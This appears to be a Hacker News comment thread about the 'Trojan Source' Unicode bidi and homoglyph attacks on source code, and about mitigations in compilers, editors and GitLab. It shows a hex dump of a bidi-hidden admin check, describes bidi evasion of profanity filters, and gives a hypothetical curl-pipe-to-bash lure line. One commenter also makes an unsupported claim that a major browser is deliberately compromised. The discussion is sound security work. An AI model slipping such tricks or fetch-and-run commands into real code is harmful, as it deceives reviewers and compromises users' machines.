| interns, and they'd review each others code. By the time
| the bug got to me the interns had left and a Sr Dev had
| spent a day looking for the bug. It took me an hour to
| find it. In isolation its easy to see but in the mess of
| all the other code, you really have to look for these
| things.
| capitainenemo wrote:
| Rust doesn't allow assignment in conditionals.
|
| https://locka99.gitbooks.io/a-guide-to-porting-c-to-
| rust/con...
| _3u10 wrote:
| It does, in fact the article you posted, shows you
| exactly when rust allows assignment in conditionals.
|
| As long as you're initializing a variable, it's allowed,
| if you're not initializing you'll have to use a block
| expression.
| capitainenemo wrote:
| Should have just used this sentence - which also directly
| covers parent's case.
|
| "Rust does not allow assignment within simple expressions
| so they will fail to compile. This is done to prevent
| subtle errors with = being used instead of ==."
|
| Better?
| ace112 wrote:
| Ooh, or you could just put in the cyrillic 'a' and even have
| it look like it's legit :)
| smsm42 wrote:
| > Cambridge research clearly shows that most compilers can be
| tricked with Unicode into processing code in a different way than
| a reader would expect it to be processed.
|
| Unless I misunderstand the premise, this in not right. The
| compiler is not "tricked" into doing anything different - it
| interprets the code the same way as it always did. It's like
| saying "rm" command "can be tricked into" deleting important
| files. The rm tool doesn't know which files are important to you,
| and the compiler doesn't - and shouldn't - know what you consider
| to be "correct" code. It would correctly compile any code that is
| syntactically correct - if there are strings inside that look
| weird to you, it doesn't matter to the compiler.
|
| The entity that can be "tricked" here is the reviewer of the code
| - who, indeed, might probably be tricked into accepting code that
| does something different than they'd think it does (though it'd
| require a very clever attacker to for the code to both do
| something nefarious with Unicode and still look innocent and not
| weird to the reviewer). Fortunately, this is quite easy to fix -
| just don't accept any patches with source code that have any non-
| ASCII outside small set of localization resources (proper code
| would have localizable resources outside the code anyway, tbh)
| and no Unicode would ever trick you.
| __alexs wrote:
| > Fortunately, this is quite easy to fix - just don't accept
| any patches with source code that have any non-ASCII outside
| small set of localization resources
|
| There are plenty of projects out there written by people who
| aren't English speakers who depend on the Unicode capabilities
| of languages to write code that is actually readable to them.
| Turning that off is far from a solution.
| smsm42 wrote:
| Can you give an example? I've never seen a project (outside
| domains on APL, etc.) that seriously relied on any Unicode
| capabilities in the code itself (again, I am not talking
| about localized strings). My native language is not English,
| I've worked with people all over Europe, China, India, Japan,
| Israel, etc. - there are a lot of exciting i18n/l10n problems
| but I have never seen much of what a compiler would need to
| be concerned with.
| ivanhoe wrote:
| Does anyone actually do that in a production code?
|
| I myself am not native English speaker and use unicode when
| writing in my mother tongue, but in 20+ years of programming
| I've never seen anyone using non-ascii chars in their
| professionally written code? Of course, you use the language
| in localization files, and perhaps in comments occasionally -
| especially in TODO stuff that's not meant to be permanent -
| but not in the actual code, like e.g. for a variable or
| function names.
|
| I'd actually consider it a bad idea, as it limits
| significantly who can manage that code in the future.
| fstrthnscnd wrote:
| > Does anyone actually do that in a production code?
|
| Would you accept teaching code as production code?
| Specifically, if you were to teach programming to young non
| English speakers, wouldn't you accept them to use words of
| their native tongue for variables and such?
|
| > I'd actually consider it a bad idea, as it limits
| significantly who can manage that code in the future.
|
| Wouldn't you say that solely using roman letters in code
| would impose a similar limit? In countries where these
| letters are seldom used (like for instance greek letters in
| western countries), only those accustomed to them would be
| able to handle code (as it has been the case until the last
| decade perhaps).
| Cthulhu_ wrote:
| It's a very western / Anglosphere attitude, and I think you
| underestimate how much code is produced in e.g. China and
| Japan nowadays, with comments in their native language.
|
| How would you name a FooBarWicket if you don't speak a word
| of English?
|
| I mean don't get me wrong, ideally everybody writes code in
| perfect English and sticks to a set of ~50 ascii
| characters, but it's not an ideal world and you have to
| keep other languages and cultures in mind.
| Aeolun wrote:
| > How would you name a FooBarWicket if you don't speak a
| word of English?
|
| How would you learn how to make a FooBarWicket without
| knowing a word of English? Any programming languages
| control constructs are almost by definition English.
| ivanhoe wrote:
| Well, what you call an Anglosphere attitude is a reality
| of learning in a majority of non-english speaking
| countries: There's simply not enough resources for
| learning in your own language.
|
| China is huge so I can see how it could work for them,
| but I still have to admit it's very hard for me to
| imagine someone becoming say a competent web dev without
| picking at least some basic English along the way, so
| they can handle at least the documentation and stay in a
| loop on new tech coming out all the time. It's not
| anything new as a concept, nor I see it as damaging for
| local cultures in any way - back in my University days
| I've learned myself some Russian so that I could read
| their physics and chemistry books which were excellent
| and way cheaper and easier for me to get than those from
| the West. One day I'll have no problem learning some
| Chinese if (or more likely when?) they become the
| referent source of knowledge.
| __alexs wrote:
| > China is huge so I can see how it could work for them,
| but I still have to admit it's very hard for me to
| imagine someone becoming say a competent web dev without
| picking at least some basic English along the way,
|
| Having worked with some large software teams in China my
| experience was that most people could speak a bit of
| English (but generally didn't want to) and were nowhere
| near at the level needed to actually design and write
| software in English.
|
| If we forced them to do everything in English quality was
| terrible and everything took ages, but it we let them
| write in Mandarin things were much better.
| notJim wrote:
| > it's very hard for me to imagine someone becoming say a
| competent web dev without picking at least some basic
| English along the way, so they can handle at least the
| documentation and stay in a loop on new tech coming out
| all the time.
|
| Why would they need to learn English to do those things?
| I'm sure there are Chinese-language tech news sites, and
| Chinese-language documentation.
| jrochkind1 wrote:
| Agreed, but I'm still curious (and don't know the answer)
| how often someone actually needs to put a "Bidi override"
| in a comment... if I were a language designer I'd be
| tempted to just say they aren't allowed in comments or
| identifiers or anywhere but string literals/data, and
| have the compiler/interpreter just reject it.
|
| (I have used a bidi override before myself, for non-
| malicious purposes!)
| amenod wrote:
| I would argue that even if you decide that you are using
| some other language and not English, there is only a
| well-defined subset of Unicode characters that should
| ever be allowed in the codebase. Bidi override control
| characters are clearly not among them, whichever language
| you choose.
| chmod775 wrote:
| > there is _only_ a well-defined subset of Unicode
| characters that should _ever_ be allowed in the codebase
|
| It's not even remotely well-defined, and probably never
| will be. Also, as long as we keep adding to unicode, you
| will need to keep your whitelist of code points updated.
|
| You can however find _a_ well-defined subset of
| characters that can be allowed.
|
| In either case you'd be essentially excluding entire
| languages.
| amenod wrote:
| You misunderstood my point:
|
| >> There is only ... that _should_ ever be allowed...
|
| What I am saying is someone decides to code in a non-
| english language (which is completely reasonable) they
| _should_ define a subset of unicode characters that is
| acceptable. Additionally, the allowed characters should
| not permit tricks like these.
|
| As for excluding entire languages... well, yes. This is
| already the case today. But OTOH it's not like
| understanding what "if" means gives you any special
| advantage in programming.
| rbanffy wrote:
| > Bidi override control characters are clearly not among
| them, whichever language you choose.
|
| Not sure how would you write a comment in an RTL human
| language in the middle of LTR code without it. Lots of
| people write learn RTL languages well before writing any
| code.
|
| What compilers can do is to process those characters and
| assign them semantic value that makes the code equivalent
| to what is expected to be rendered.
|
| Now, bidi overrides in identifier names is a nightmare
| I'd prefer to avoid.
| amenod wrote:
| The same way as you write a comment in a LTR human
| language in the middle of RTL code - you don't. You stick
| to either LTR or RTL. This is code, not prose.
| WalterBright wrote:
| > Not sure how would you write a comment in an RTL human
| language
|
| Siht ekil.
| jrochkind1 wrote:
| You do not actually need the bidi override control
| character to put a comment in an RTL language in the
| middle of LTR code.
|
| You only need it if you are doing this, and the default
| Unicode algorithm for guessing LTR/RTL boundaries gets it
| wrong, so you need to override with an explicit bidi
| override control. I'm not even sure how feasible that is
| to do in current editor/IDE environments developers who
| have this use case might use.
|
| I am genuinely curious how often these sorts of
| situations come up in actual development.
|
| > What compilers can do is to process those characters
| and assign them semantic value that makes the code
| equivalent to what is expected to be rendered.
|
| I don't understand what you mean or how that's even
| possible, for the kinds of attacks discussed in OP.
| jrochkind1 wrote:
| Btw here's proof. Here is ltr text and rtl `ibriyt text
| `rby interspersed with no bidi override control
| characters to be found.
|
| Unicode can handle this, it has a heuristic algorithm for
| it. Note how if you try to select the text character-by-
| character, your selection does funny things at the rtl to
| ltr boundaries, because the byte order doesn't match the
| order on the screen. It really is handling the
| directionality changes, with the letters entered in
| "order" across changes, there is no funny entry or
| ordering going on, this is plain old normal unicode
| handling interspersed directionality changes just fine,
| with no bidi overrides.
|
| It just sometimes gets it wrong for the intent of the
| author. Especially when there are characters at the
| boundaries that are themselves not strongly associated as
| rtl or ltr (like ordinary "western arabic numerals" or
| punctuation). That's what the bidi override control char
| is for.
| dmz73 wrote:
| When you code for yourself, write what you want. If you
| write to collaborate then use English/ASCII. Imagine
| international aviation if they allowed the same BS that
| people in IT allow and now even try to promote - everyone
| talking their own language and not understanding each
| other - we would have planes colliding and crashing all
| over the place.
| Aeolun wrote:
| We used to have that, with exactly the result you
| describe. Which is why it was changed.
|
| We'll get there eventually with software, but it
| generally doesn't kill people so there's less incentive.
| wizzwizz4 wrote:
| Aviation requires real-time communication; it's not a
| great analogy, I don't think.
| worrycue wrote:
| I still wonder though, just how much production non-
| comment source code is not written in the ASCII character
| set.
|
| The libraries of most programming languages (developed in
| the west) are in ASCII - frameworks and middleware too.
| Have people in countries like Japan and China actually
| translated all of that code - renaming functions,
| classes, and variable names to their native tongue in
| Unicode - or do they just learn the English names (they
| are all nouns/pronouns and at most simple phrases so
| translation should not be too difficult; they don't have
| to understand English grammar).
| Moru wrote:
| Microsoft translated all the commands in the scripting
| language for excell to native language, making it totally
| impossible to use for anyone. You can't even google it
| because the help is so split up in different languages.
| Zababa wrote:
| Not only the commands, the separator too. In some
| languages, it's FUNCTION(arg1, arg2), in some others it's
| FONCTION(arg1; arg2)
| Bayart wrote:
| I've definitely seen it done, in both code I was adjacent
| to and code I was pulling from outside. I have vivid
| memories of stumbling on a lib doing seemingly what I
| needed but with all comments in Chinese and variables/funcs
| in Pinyin.
| Piskvorrr wrote:
| I can attest that it happens, even in (natural) languages
| that use Latin scripts. Sure, "just use en.US-ASCII" is a
| mitigation, and most (Euroamerican) code follows this; the
| bug extends to string literals however ("they don't end
| where you see them // this is actually not part of the
| string; return;"), so a different approach is needed.
| Const-me wrote:
| Professionally made GUI software needs Unicode even when
| English localized, for typography.
|
| Proper quotes, proper dashes (ASCII doesn't have a dash
| character, it only has minus), non-breakable space, soft
| hyphen, EUR character, Greek letters like p and m, etc.
| jdavis703 wrote:
| Most of these should be in a separate file for i18n, not
| directly in the source code.
| Const-me wrote:
| Internationalization is not limited to putting strings
| into a table in resource. It also needs non-trivial
| amount of code. Printing numbers into strings is code not
| data. Yet if you want the numbers to look good, like "600
| mm" or "6x10-4 meters", you gonna have Unicode in code,
| not the resources.
|
| Another thing, not every software needs i18n. Depends on
| the market. I'm yet to see a C++ compiler which would
| localize their output messages.
| jdavis703 wrote:
| "Meters" is an English word, and a string like "600 mm"
| should still probably be extracted from the code as "%d
| mm."
| Const-me wrote:
| Still, there're also string like "6*10-4"
| kzrdude wrote:
| GCC supports localization, that's one C++ compiler.
|
| Intel C++ compiler seems to have a Japanese version (not
| tried).
| [deleted]
| klohto wrote:
| You argument away your own fix. Proposed fix is like if rm was
| limited to files outside of /sys, plenty of projects depend on
| the standardized behavior.
| Sebb767 wrote:
| > The rm tool doesn't know which files are important to you,
| and the compiler doesn't - and shouldn't - know what you
| consider to be "correct" code.
|
| This is actually no longer true. Many rm implementations today
| prevent you from deleting a path including the root directory,
| unless you explicitly specify `--no-preserve-root`. Similarly,
| a lot of compilers tend to warn you or outright stop if they
| detect code that is very likely to be buggy - the rust compiler
| warning about these control characters is just the latest
| example.
|
| Of course, in theory, each tool should do its job and the user
| should be the boundary to know whats right. In practice,
| though, these heuristics tend to catch bugs-to-be 95% of the
| time (at least in my experience) and are easily disabled
| otherwise, so they are good to have.
| wizzwizz4 wrote:
| I couldn't care less about my root directory. The only things
| I care about are the motherboard firmware and the /home
| directory, and nothing prevents `rm` from deleting those.
|
| The `--one-file-system` or `--preserve-root=all` flags are
| more useful than `--preserve-root`, but they're not defaults.
| (For a good reason: compatibility.)
| robin_reala wrote:
| APL developers would disagree.
| edent wrote:
| BDI can be used to evade profanity filters. Writing something
| like `‮kcuf` will display a banned word.
|
| Does it work here?
|
| > I am an toidi
|
| No? HN strips the BDI.
|
| But there are plenty of other systems which display weird RTL
| behavior.
| lokedhs wrote:
| Yes, Mastodon has recently been discussing this.
| https://github.com/mastodon/mastodon/issues/2777
| im3w1l wrote:
| I remember bringing this up many years ago. Yes specifically
| making code seem like comments using bidi. I'm just a little bit
| salty I won't get the credit.
|
| https://bugs.eclipse.org/bugs/show_bug.cgi?id=339146
| ComodoHacker wrote:
| The paper: https://www.trojansource.codes/trojan-source.pdf
| robotmay wrote:
| This was a pretty interesting thing to mitigate - we added some
| support around it to GitLab after it was reported to us, which
| shipped in the latest security release:
| https://gitlab.com/gitlab-org/gitlab/-/commit/3fb44197195b57...
| (you can actually see it in effect on that commit's examples,
| which is quite meta). These characters have valid use-cases in
| right-to-left languages like Arabic, Japanese etc, so it had to
| be configurable for project-owners if they have legitimate use-
| cases for it. Our focus was on making sure that repository
| maintainers could see these characters in code reviews.
|
| The homoglyph attack is interesting but it really should be
| noticed as part of a code review process, as it requires adding
| the imitation function calls at some point too. It'd also likely
| be pretty frustrating to end users if we were to highlight every
| single unicode character that looks like the latin alphabet.
|
| It's certainly a good lesson in not copy/pasting random snippets
| from the internet and pasting them into a root shell, however :D
| (we do always highlight the bidi characters on GitLab snippets,
| though)
|
| Aside: this was a royal pain in the arse to figure out if I had
| live examples in the specs, because vim also just rendered them
| "correctly". I ended up checking the files in Windows Notepad on
| another machine to sanity check them.
|
| Thanks to the authors for responsible disclosure.
| charcircuit wrote:
| >These characters have valid use-cases in right-to-left
| languages like Arabic, Japanese etc,
|
| I've never seen it used for Japanese. I don't think there is a
| valid use case for Japanese.
| robotmay wrote:
| Ah yes you're right - looks like that can be handled with
| CSS: https://www.w3.org/International/articles/vertical-
| text/. Although from what I've seen most Japanese websites
| tend to be left-to-right instead anyway.
|
| Hebrew would be a more valid second example I think. I'd be
| curious to know how many languages maintain their RTL
| preference online.
| dhosek wrote:
| Japanese1 isn't a right to left language, exactly. It can
| be written horizontally, in which case it's L-R, top to
| bottom, or, vertically, in which case it's top to bottom,
| with columns running R-L, but functionally, this is still
| like L-R typesetting, just with the characters rotated
| 90deg CCW and the pages are then read in the same order as
| pages in a R-L book. This is typical of manga which is why
| there might have been confusion by the OP about the
| directionality of Japanese.
|
| [?][?][?]
|
| 1. All of this also applies to Chinese and Korean.
| Interestingly, traditional Mongolian script is also written
| vertically, but in columns left to right rather than right
| to left.
| capitainenemo wrote:
| This doesn't feel particularly new either? Isn't it pretty much
| a new variant of https://github.com/reinderien/mimic ?
|
| Which, if one is suspicious of code, can be defeated in vim
| with: set encoding=latin1
| specialist wrote:
| > _It 's certainly a good lesson in not copy/pasting random
| snippets from the internet..._
|
| For someone with more gumption than me:
|
| Future copy & paste will default have intermediate screenshot
| and OCR steps. Voila: charset scrubbing for free.
|
| Why not? Already today misc UIs and renderings disallow text
| selection. Drives me nuts.
| kevin_thibedeau wrote:
| This is too complicated for a personal supercomputer to be
| burdened with. Better to ship everything on the clipboard to
| a sanitizer service.
| modeless wrote:
| The future is now. Android has been doing this for years and
| it's awesome. There's no text you can't copy.
|
| To clarify, by default copy and paste works the normal way,
| but you can open the app switcher to use the OCR copy/paste
| which works on non-selectable text too, even in images.
| QuercusMax wrote:
| There's a way to prevent this - to my great annoyance,
| health apps (such as the ubiquitous MyHealth variants) and
| banking apps can prevent you from taking screenshots or
| copying text. This is presumably to prevent screen-scraping
| apps from stealing your private data, but it's really
| annoying when you're trying to screenshot a QR code for
| some kind of check-in process.
| checkyoursudo wrote:
| That's why you need a second phone to photograph the
| screen of the first phone.
| lelandbatey wrote:
| I was impatient to find the example you were talking about; as
| far as I can tell, this is the line with the example:
| https://gitlab.com/gitlab-org/gitlab/-/commit/3fb44197195b57...
|
| And here's what it looks like in various conditions/viewers:
|
| With the fix, this is how it looks in the browser in the Gitlab
| interface: if (accessLevel != "user") { //
| Check if admin
|
| Without the fix, viewed raw (and thus viewed in a vulnerable
| way), it looks like this: if (accessLevel !=
| "user") { // Check if admin
|
| And in a hex viewer, it looks like this:
| 000005b0: 2020 2020 2020 2069 6620 2861 6363 6573 if
| (acces 000005c0: 734c 6576 656c 2021 3d20 2275 7365
| 72e2 sLevel != "user. 000005d0: 80ae 20e2 81a6 2f2f
| 2043 6865 636b 2069 .. ...// Check i 000005e0: 6620
| 6164 6d69 6ee2 81a9 20e2 81a6 2229 f admin... ...")
| 000005f0: 207b 0a20 2020 2020 2020 2020 2020 2020 {.
| 00000600: 2063 6f6e 736f 6c65 2e6c 6f67 2822 596f
| console.log("Yo 00000610: 7520 6172 6520 616e 2061 646d
| 696e 2e22 u are an admin."
| Antwnis wrote:
| That's a great example ^ that demonstrates exactly how this
| vulnerability can be easily abused
| smashed wrote:
| I was intrigued by your meta example and I took a look. It took
| me 3-4 minutes to find the warning, and I was looking for it!
|
| I was expecting a big fat warning on the merge request itself,
| or maybe on the lines containing the dangerous chars.
|
| In the end, it is a small ? character inserted were the unicode
| control chars are, and a mouseover tooltip warning about a
| potential issue.
|
| The warning is good, but why so subtle? Sorry for the
| criticism. The feature is still a huge positive.
| robotmay wrote:
| Thanks for the feedback! Our primary use-case when deciding
| on it was to flag these up in a code-review situation, to
| prevent malicious content being submitted in merge requests
| to unsuspecting projects. We found this made it stand out
| enough to the reviewer when performing code reviews. I also
| try to not be too quick to add new alerts or sections to the
| GUI as we sometimes get criticised for having too much
| clutter D:
|
| GitHub by comparison went down the alert banner route, from
| what I can see. I'm not opposed to adding something to that
| effect as well though - especially for inexperienced
| reviewers, it would be nice to include some more information
| about the potential exploit. That could be something we
| revisit when we add the homoglyph highlighting.
| slim wrote:
| this was a royal pain in the arse to figure out if I had live
| examples in the specs, because vim also just rendered them
| "correctly"
|
| That's because vim supports Farsi/Arabic natively from day one.
| Even if the OS does not support it, you can still write
| bidirectional and right-to-left text in vim. Never knew the
| reason, but thanks Bram Molenaar.
| stackbutterflow wrote:
| > It's certainly a good lesson in not copy/pasting random
| snippets from the internet and pasting them into a root shell,
| however
|
| I gotta say that I always make sure that I understand each
| piece of code that I copy paste but I do copy paste and never
| thought of this type of attack. Maybe that's something I should
| pay attention to in the future.
| captaincrunch wrote:
| from the article, its likely you'd not even notice - unless
| you pasted in an ascii only editor that doesn't allow
| anything other than plain old text.
| acdha wrote:
| > It'd also likely be pretty frustrating to end users if we
| were to highlight every single unicode character that looks
| like the latin alphabet.
|
| Have you tried something similar to what the browsers do where
| highlighting is only enabled when there are multiple scripts
| mixed within the same token? Source code seems like it would be
| harder since you have many tokens rather than just a single one
| as in a hostname, and I'd be curious how much legitimate usage
| mixes scripts for technical reasons because you have something
| like a language or framework convention that certain names
| start with a particular English-derived term.
| robotmay wrote:
| So far we're just detecting individual bidi characters, but
| looking at characters in their greater context could be quite
| interesting. This would seem like quite a good use-case for
| machine-learning too, if you wanted to get super into it.
| jhgb wrote:
| > It'd also likely be pretty frustrating to end users if we
| were to highlight every single unicode character that looks
| like the latin alphabet.
|
| That actually strikes me as very desirable. (Especially in
| light of the old maxim that "programs must be written for
| people to read, and only incidentally for machines to
| execute".)
| grishka wrote:
| Latin C and Cyrillic S aren't the same letter. The latter is
| actually an "s". It would be a pain in the ass to work with
| strings if those Cyrillic letters that look like their Latin
| counterparts reused their codepoints. Imagine having to
| convert "M" to lowercase. Would that return "m" or "m"? Same
| for "H", "h" or "n"?
|
| And, actually, there was some really really cursed Soviet
| encoding that did this to save bits. The Russian railway
| company still uses it[1] to this day.
|
| [1] https://habr.com/ru/post/547820/
| gambas99 wrote:
| > there was some really really cursed Soviet encoding
|
| I know at least 10 stories that start like this
| jhgb wrote:
| > Latin C and Cyrillic S aren't the same letter.
|
| Well, as a moderately old Czech, I'm somewhat familiar with
| Cyrillic. They kind of used to force it on us in schools.
| wizzwizz4 wrote:
| Those Unicode characters aren't just there for show. They're
| part of real scripts that real people use; it would be
| annoying for people using those scripts.
| jhgb wrote:
| I'm fairly sure this could be arranged for. As in, if
| there's too many of them belonging to the character set of
| a particular language, then it's very likely that it's
| simply a text in that language. But random characters in
| the middle of ASCII identifiers are _probably_ not
| something that you want.
| robotmay wrote:
| Yeah I'm not opposed to adding highlighting to them, and
| we are investigating how to do it, but it was less clear-
| cut than the bidi characters (which are totally invisible
| when rendered). I think we'll want to make it a bit more
| configurable and probably a separate option to the one
| which highlights the bidi characters.
| R0b0t1 wrote:
| This type of attack isn't new. I can't recall the names but
| there are afair multiple C/C++ coding standards that limit
| everything to ASCII to avoid precisely this attack, but
| also others with visually similar but nonequivalent names.
| pas wrote:
| Yes, and they should be in well annotated/marked
| string/data sections, not in logic code.
| JoshTriplett wrote:
| Exactly. When we were adding support for non-ASCII
| identifiers to Rust, and thinking about homoglyphs and
| confusable characters, we needed to evaluate the tradeoffs
| between catching such characters and inconveniencing the
| speakers of various languages who want to write Rust in
| their language.
| Pxtl wrote:
| I skimmed the article but I didn't see any examples of this being
| exploited... Has anybody done a proof of concept on how Bidi can
| be used? I'm having trouble thinking of a line of code with a
| comment or literal where the code is legit forwards but malicious
| backwards.
| akersten wrote:
| It is wrong to call this a bug, this is a _feature_ of Unicode
| and very intentional. Whether we should have thought about that
| when allowing parsers to digest anything outside of ASCII is the
| real question. The answer is probably "IDEs and compilers should
| ignore character-direction codes when looking at source files."
| But that doesn't solve homoglyph attacks (and other undiscovered
| deception). What a fun can of worms. Who gets to solve it?
| zeepzeep wrote:
| > "IDEs and compilers should ignore character-direction codes
| when looking at source files."
|
| No I think some people would disagree, arabic coders for
| example. People just need to be aware of this when using
| unicode in their product.
| samus wrote:
| Editors and code views should definitely show when BiDi and
| other interesting Unicode features are used, just like they
| already do with spaces and zero-width whitespaces. These
| features should definitely work, but they are a liability if
| they can also used to mislead human users.
|
| Compiler maintainers need to update the syntax rules to
| restrict free mixing of unicode characters. Similar
| restrictions were already adopted in domain names.
| kingcharles wrote:
| You're right - their headline is written for attention. It's an
| exploit of a feature.
|
| What I'm interested to know is whether there is any code
| already out there in the wild with this exploit in it? An
| intelligence service could have exploited this years ago
| without anyone noticing until now.
|
| Unicode is a pathway to all manner of hijinks, including as you
| say, homoglyph attacks. For instance, on some TLDs I can easily
| create two different domain names that render identically in
| the browser.
| comex wrote:
| > What I'm interested to know is whether there is any code
| already out there in the wild with this exploit in it?
|
| It's possible, but I doubt it. The paper mentions that Vim
| isn't vulnerable to the bidirectional attack. Not mentioned
| in the paper: neither is `less`, the pager, which is used by
| default for `git diff` and other Git commands. Nor are either
| of the first two terminals I tried, when `cat`ing the file
| without a pager.
|
| All of the aforementioned programs display the direction
| markers as either escape sequences highlighted in bright
| colors, or garbage characters, both of which stand out
| visually like a sore thumb. Now, that's more a sign of poor
| Unicode support in those programs than it is anything to
| their credit. But it does mean that this kind of attack is
| incredibly brittle, at least in any codebase where some
| people working on it are likely to be using Unix tools.
| There's a high chance the aberrant characters will be spotted
| at some point or other.
|
| And once spotted, it's self-evident that it's an attack. I
| suspect real attacks would try to be more subtle, introducing
| bugs that could pass as genuine mistakes, at least at first
| glance.
| kingcharles wrote:
| It's sad that largescale exploitation of this is stopped
| only because many applications still have really poor
| Unicode support and would therefore make the changes human-
| visible.
| Groxx wrote:
| Coding editors also often show this kind of thing
| intentionally, as those characters are meaningful for
| interpretation purposes. Many of them are very UTF
| friendly, but they still show zero-width spaces as e.g.
| "<zwsp>" _on purpose_.
|
| They've also often shown non-printable ASCII control
| characters for basically forever. Null bytes and \bel and
| whatnot are very important despite being "invisible", and
| they've been around for decades.
| tetha wrote:
| I've been bitten by things like this from an entirely
| unexpected angle - messengers like teams and skype
| sometimes <helpfully> replace characters like "-" and " "
| with all manner of more readable unicode characters. More
| readable, until the YAML parser choked.
|
| Since that, I pretty much always run some variant of the
| gremlins plugin, which highlights pretty much all unicode
| spaces, dashes and other weird control symbols.
| Groxx wrote:
| Chat apps replacing (tm) with a horrifically large,
| poorly-rendered and off-colored "TM" and ruining The
| Joke(tm) is a major pet peeve of mine, yeah :| And even
| worse, it seems to be spreading, as each one blindly
| copies the horrible decisions of the others. I would
| disable all of those auto-replacements everywhere _if
| only I could disable all of those auto-replacements
| everywhere_.
| powersnail wrote:
| I think making these chars human visible is a feature.
| Most code editors have features like showing invisible
| characters, displaying some representation of white space
| characters, or highlighting control sequences.
|
| Because the editor is supposed to edit plain text, which
| means all characters must be editable. And something can
| only be editable if they are visible.
| josephcsible wrote:
| > Now, that's more a sign of poor Unicode support in those
| programs than it is anything to their credit.
|
| But that behavior is intentional. If you want, you could do
| "alias less='less -r'", and then it would behave the way
| you want, and you'd become vulnerable to this attack.
| comex wrote:
| -r makes it pass all control characters to the terminal.
| To quote less's man page:
|
| > Warning: when the -r option is used, less cannot keep
| track of the actual appearance of the screen (since this
| depends on how the screen responds to each type of
| control character).
|
| This is not the same as actually supporting (i.e. being
| able to keep track of the screen state for) bidirectional
| text that may legitimately use those characters.
|
| For that matter, the terminal may not support it either,
| as I mentioned.
|
| Though, today I learned there has been some effort in
| recent years to improve bidirectional text handling in
| terminals and terminal applications, generally:
|
| https://www.reddit.com/r/linux/comments/dn8uka/bidirectio
| nal...
| bmn__ wrote:
| > I can easily create two different domain names that render
| identically in the browser
|
| You can't (any more)1. That worked for a limited amount of
| time, then mitigations were put in place, and subsequently
| standardised as part of Unicode. Everyone who deals with
| implementations of Unicode is supposed to be knowledgeable
| about the security relevant aspects, you can bet that the
| people working on browsers definitely are.
| <http://p3rl.org/perlre#Script-Runs>
|
| 1 invitation to prove me wrong, I am on purpose leaning far
| out the metaphoric window and will gladly eat my words
| Amorymeltzer wrote:
| Came here to provide exactly that link (canonical:
| <https://perldoc.perl.org/perlre#Script-Runs>). For those
| who figured they'd skip over it, it's pretty neat IMO. Perl
| 5.28 (released 2018) added a new technique for matching
| patterns that aren't all from the same Unicode script, a
| "script run."
|
| >In most places a single word would never be written in
| multiple scripts, unless it is a spoofing attack. An
| infamous example, is
|
| >>paypal.com
|
| >Those letters could all be Latin (as in the example just
| above), or they could be all Cyrillic (except for the dot),
| or they could be a mixture of the two. In the case of an
| internet address the .com would be in Latin, And any
| Cyrillic ones would cause it to be a mixture, not a script
| run.
| kingcharles wrote:
| > You can't (any more)1.
|
| That was my understanding too, until this last week when I
| figured out you could.
|
| I'm pretty certain this: and this: are the same rendering,
| but are different Unicode, and I can register them both as
| domain names under some TLDs. Google displays them the same
| in their result pages too.
| bmn__ wrote:
| I examined closely and found both are exactly the same, a
| perfectly valid Latin script run and equivalent to the
| expression in escape notation
| "\N{U+74}\N{U+68}\N{U+69}\N{U+73}\N{U+3A}".
| > perl -C -E'print
| "\N{U+74}\N{U+68}\N{U+69}\N{U+73}\N{U+3A}"' | hex
| 0000 74 68 69 73 3a
| this:
|
| HN software likely ate the relevant details you wanted to
| show, can you please try again and use a notation that
| survives the HN filter?
| kingcharles wrote:
| Try this: https://kingcharles.one/unistrange.html
|
| When I created the file in Notepad it showed the hidden
| code, but I can register both those as valid domains and
| Google will show them identically in the SERPs, and
| Safari will show them both identically in the address
| bar. Chrome/Edge expands them in the address bar, but
| will render them the same in HTML. Have not tested on
| Firefox.
|
| If you View Source in Chrome it won't show the hidden
| code, but if you open the dev tools it will start to
| break.
| _3u10 wrote:
| Doesn't really matter. The major browser is intentionally
| security compromised, anyway.
|
| If you pay the maker of the that browser they'll inject any
| links you want on most pages on the internet. Just give
| them the hash of the email / phone number of your target.
| It helps both economically and passing their security
| checks if you have more than a thousand victims you want to
| target.
|
| If you want to fool a developer just host it on a github
| page. If you want to fool anyone else, just do a decent
| clone of their page.
|
| If you want it to appear on most major news network sites,
| just pay $150 for a newswire.
|
| Think about it, if you crafted the right article, maybe
| about a fork of homebrew etc, and redirected to a github
| page with a link stating you needed to copy and paste
|
| curl http://github.com/asdkfjas/homebrew.sh | bash
|
| into their terminals how many would do it?
| KennyBlanken wrote:
| > You're right - their headline is written for attention
|
| That or just ignorance. Krebs has zero training or education
| in computer science or programming.
| josephcsible wrote:
| It's a feature for prose text, so programs like Word should
| support it. It's a security bug in anything designed to be
| parsed or interpreted by software, so programs like Visual
| Studio Code should refuse to honor it.
| asddubs wrote:
| or it should be confined to the marker of the string (i.e.
| the quotation marks) if you're doing syntax highlighting
| anyway
| hollerith wrote:
| Brilliant! Nobody would copy prose, then paste it into a code
| file or REPL without re-reading it after the paste.
| ximeng wrote:
| https://github.com/rust-lang/rust/issues/28979 plenty of
| discussion here on Unicode including homoglyph attacks. This is
| for Rust but has links to Go and Zig. The Unicode standard also
| has extensive discussion, for example
| https://unicode.org/reports/tr31/ and
| http://unicode.org/reports/tr39/ on identifiers and security.
|
| In general a multilayer solution is needed: compilers, linters,
| Unicode standard, merge tools, editors, and so on.
| rurban wrote:
| But they still don't get it right, they explicitly allow not
| identifiable Unicode identifiers. The C20 committee recently
| allowed also insecure identifiers, completely ignoring the
| Unicode identifier guidelines. They stated that nobody cares,
| everybody wants them and making them secure would need the
| entire Unicode database. Why do they allow noobs into such
| committees? What is needed are the normalization tables
| (tiny), the script list (tiny) and the two xid lists.
| estebank wrote:
| > they explicitly allow not identifiable Unicode
| identifiers. [...] They stated that nobody cares, everybody
| wants them and making them secure would need the entire
| Unicode database.
|
| Could you elaborate? rustc ships with the entire Unicode db
| and only allows indents with codepoints advertised by
| Unicode as allowed in indents.
|
| The closest to walking off the beaten path is a (still
| unmerged) parser recovery PR that accepts emojis as
| identifiers _if and only if_ a parse error would otherwise
| occur as a way to avoid knock down errors when someone
| tries to use them.
| Animats wrote:
| What's needed is to impose on programming languages, outside of
| comments, checks similar to the checks made for domain names.
|
| There is a draft standard for this.[1] It references RFC 5893
| and some other documents. Some of the rules:
|
| - All code points in a single label must be taken from the same
| script as determined by the Unicode Standard Annex #24: Script
| Names. Exceptions to this guideline are permissible for
| languages with established orthographies and conventions that
| require the commingled use of multiple scripts. (Like mixing
| kanji and romaji in Japanese.)
|
| - The "Bidi rules" of RFC 5893, which define allowed right to
| left and left to right modes, must be enforced. These are
| complicated, because of such things as the Arabic and Hebrew
| convention of right to left text with left to right numeric
